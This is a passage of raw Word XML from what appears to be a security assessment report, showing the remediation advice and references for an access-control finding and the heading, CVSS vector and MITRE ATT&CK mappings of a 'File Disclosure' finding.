          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>HTTP GET</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="350641E4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> request</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="5FC29DC5" w14:textId="6ABB234B">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2B3E09F" w:rsidP="0D325B6E" w:rsidRDefault="22B3E09F" w14:paraId="4C69E8CD" w14:textId="2D55786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2B3E09F" w:rsidP="0D325B6E" w:rsidRDefault="22B3E09F" w14:paraId="3213E174" w14:textId="645BF90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2B3E09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22B3E09F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5EA878AE" w:rsidP="0D325B6E" w:rsidRDefault="5EA878AE" w14:paraId="6F558205" w14:textId="57482AB8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>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EA878AE">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strict access control </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ks</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="3729177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EA878AE">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restrict users t</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 xml:space="preserve">only </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="525F0B78">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>access</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pe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itt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ed</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 files and obje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6D366C2">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t is re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ded</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o not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 rely o</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n obsc</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urity or clie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7B5908D8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">hecks. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7E9C7CF5" w:rsidP="0D325B6E" w:rsidRDefault="7E9C7CF5" w14:paraId="665A3602" w14:textId="2687C4E1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>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 xml:space="preserve">Use random non-guessable identifiers to prevent attackers from guessing the ids of other </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="3B424F7A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>resourc</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="7E9C7CF5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>es</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6BBF6776" w:rsidP="0D325B6E" w:rsidRDefault="6BBF6776" w14:paraId="43C87B03" w14:textId="410BED33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>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6BBF6776">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Utilize short-lived, signed, or tokenized URLs when sharing sen</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="76F61D21">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sitive files or resources instead of static IDs.</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="6BBF677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1EEB3A8A" w14:textId="00097117">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:after="0" w:afterAutospacing="off"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="22B3E09F" w:rsidP="0D325B6E" w:rsidRDefault="22B3E09F" w14:paraId="3519C614" w14:textId="19994F7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B3E09F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>References</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="58346A84">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0E80EBCA" w:rsidP="0D325B6E" w:rsidRDefault="0E80EBCA" w14:paraId="38D26062" w14:textId="3DF83FAE">
      <w:pPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:strike w:val="0"/>
          <w:dstrike w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="R8e2e42855a7a4b6b">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="0E80EBCA">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:strike w:val="0"/>
            <w:dstrike w:val="0"/>
            <w:noProof w:val="0"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>CISA - Preventing Web Application Access Control Abuse</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="696EA817" w:rsidP="0D325B6E" w:rsidRDefault="696EA817" w14:paraId="18BA50A5" w14:textId="7D5A825F">
      <w:pPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="R18968d39dfdd422f">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="696EA817">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:strike w:val="0"/>
            <w:dstrike w:val="0"/>
            <w:noProof w:val="0"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>OWASP - IDOR Prevention</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="61E56F28" w14:textId="351FC198">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="53AC9197" w14:textId="6DF63142">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="37D15B81" w:rsidP="0D325B6E" w:rsidRDefault="37D15B81" w14:paraId="608AFE35" w14:textId="23280E3D">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc1222469527" w:id="941087979"/>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="37D15B81">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:color w:val="FFC000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>▌</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="37D15B81">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:color w:val="0F4761" w:themeColor="accent1" w:themeTint="FF" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>M1:</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc2125293838" w:id="1969490954"/>
      <w:bookmarkStart w:name="_Toc1112749513" w:id="946431222"/>
      <w:bookmarkStart w:name="_Toc940704001" w:id="531501804"/>
      <w:bookmarkStart w:name="_Toc1062418535" w:id="1387816427"/>
      <w:bookmarkStart w:name="_Toc1681970504" w:id="255478184"/>
      <w:bookmarkStart w:name="_Toc1672114518" w:id="1915362248"/>
      <w:bookmarkStart w:name="_Toc832755077" w:id="220843387"/>
      <w:bookmarkStart w:name="_Toc363395658" w:id="1567262563"/>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="6143CFDE">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="5AED543B">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">File </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="2C5A121C">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Disclosure</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1969490954"/>
      <w:bookmarkEnd w:id="946431222"/>
      <w:bookmarkEnd w:id="531501804"/>
      <w:bookmarkEnd w:id="1387816427"/>
      <w:bookmarkEnd w:id="255478184"/>
      <w:bookmarkEnd w:id="1915362248"/>
      <w:bookmarkEnd w:id="220843387"/>
      <w:bookmarkEnd w:id="1567262563"/>
      <w:bookmarkEnd w:id="941087979"/>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715E898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7848B9B" w14:textId="05E201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00F7314" w14:textId="71E23DF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EA6A06" w14:textId="3BA0488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9FAA40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26DD04" w14:textId="4FAFA75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4CB7409" w14:textId="67C6DB4F">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EFE6D70" w:rsidP="0D325B6E" w:rsidRDefault="2EFE6D70" w14:paraId="09D475C7" w14:textId="478173D5">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
                <w:sz w:val="60"/>
                <w:szCs w:val="60"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0D325B6E" w:rsidR="2EFE6D70">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
                <w:sz w:val="60"/>
                <w:szCs w:val="60"/>
              </w:rPr>
              <w:t>6.</w:t>
            </w:r>
            <w:r w:rsidRPr="0D325B6E" w:rsidR="1D3A3269">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
                <w:sz w:val="60"/>
                <w:szCs w:val="60"/>
              </w:rPr>
              <w:t>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46C0F7A" w14:textId="66E94D84">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2EF34AA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8BD5FD" w14:textId="14D6AEE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D4E70AB" w14:textId="3B8CD6F2">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5BAE6D9"/>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2563180"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="15E62C4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BE0A98" w14:textId="2D2FCE9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317F505" w:rsidP="0D325B6E" w:rsidRDefault="1317F505" w14:paraId="36942B07" w14:textId="3A089103">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:noProof w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="1317F505">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>AV:</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="5BA15BC8">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/S</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="1317F505">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>A:N</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="271CDB8B">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A17FF72" w14:textId="604D7CB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673E9B1" w:rsidP="0D325B6E" w:rsidRDefault="5673E9B1" w14:paraId="71CE2F3F" w14:textId="4FDCE6A8">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidR="5673E9B1">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6613C7D" w:rsidP="0D325B6E" w:rsidRDefault="66613C7D" w14:paraId="4D187465" w14:textId="402BD671">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:noProof w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="R93894474c18841df">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="66613C7D">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>T1213</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0FB911E8">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>:</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="66613C7D">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t xml:space="preserve"> Data from Information Repositories</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w:rsidR="66613C7D" w:rsidP="0D325B6E" w:rsidRDefault="66613C7D" w14:paraId="3C141B6F" w14:textId="67D579F5">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:noProof w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="Rc55a7ac7e31940b2">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="66613C7D">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>T1</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="03F06492">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>0</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="66613C7D">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>05</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="2263A945">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>:</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="66613C7D">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t xml:space="preserve"> Data from Local System</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="5B7CCDEF">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C7DDA9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292B915" w:rsidP="0D325B6E" w:rsidRDefault="6292B915" w14:paraId="0D912A3A" w14:textId="10A46F65">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidR="6292B915">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DCC7489" w:rsidP="0D325B6E" w:rsidRDefault="7DCC7489" w14:paraId="636F956B" w14:textId="6E59EA8C">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13ebbc97ed7a46e9">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="7DCC7489">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>M1057: Data Loss Prevention</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w:rsidR="7DCC7489" w:rsidP="0D325B6E" w:rsidRDefault="7DCC7489" w14:paraId="57D25F43" w14:textId="4CB36B12">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="0070C0"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="Rc9f673391f6a42ad">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="7DCC7489">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
